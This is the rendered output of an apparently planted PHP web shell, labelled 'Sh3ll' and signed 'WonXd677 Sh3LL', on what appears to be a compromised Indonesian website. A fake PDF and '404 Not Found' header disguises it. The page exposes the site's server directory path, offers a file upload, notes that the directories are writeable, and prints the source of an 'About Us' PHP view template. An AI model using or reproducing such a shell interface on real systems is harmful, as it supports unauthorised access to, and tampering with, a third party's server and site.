%PDF-1.4 404 Not Found
Sh3ll



Directory :  /var/www/vhosts/lautnusantara.com/httpdocs/web/app/Views/theme/spirit/module/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Current File : /var/www/vhosts/lautnusantara.com/httpdocs/web/app/Views/theme/spirit/module/mod_aboutus.php
<?php
$dt_aboutus = $News_Statis_Model->get_statis(false, 1)->getResultArray();
$data = $dt_aboutus;

if ($data[0]['url_image'] == NULL or $data[0]['url_image'] == "") {
    $image_about_us = 'none';
} else {
    $image_about_us = 'url(' . $data[0]['url_image'] . ')';
}
//$image_about_us = 'none';
?>

<section id="about_part">
    <div class="container">
        <div class="row">
            <div class="col-sm-6">
                <div class="about_left text-center"
                    style="background: <?= $image_about_us; ?>;background-position: center;background-size: cover;position: relative;height: 330px;">
                    <div class="about_left_inner" style="padding: 135px 0;">
                        <!--<img src="<?= $data[0]['url_image'] ?>" alt="img" > -->
                        <a class="venoboxvideo" data-vbtype="video" href="<?= $data[0]['video'] ?>"
                            aria-label="About Us">
                            <i class="fa fa-youtube-play"></i>
                        </a>

                        <!--<h3>SSN Video Presentation</h3>
                                <p>Perkembangan dunia teknologi informatika. di bidang pengembangan software dan aplikasi perangkat lunak.</p>-->
                    </div>
                </div>
            </div>
            <div class="col-sm-6">
                <div class="about_right section_head">
                    <h2>About Us</h2>
                    <?= $data[0]['introtext'] ?>
                    <p><a href="<?= '/detail/tentang_kami' ?>" class="multi_button" aria-label="Read more about us">More
                            About Us</a></p>
                </div>
            </div>
        </div>
    </div>
</section>

WonXd677 Sh3LL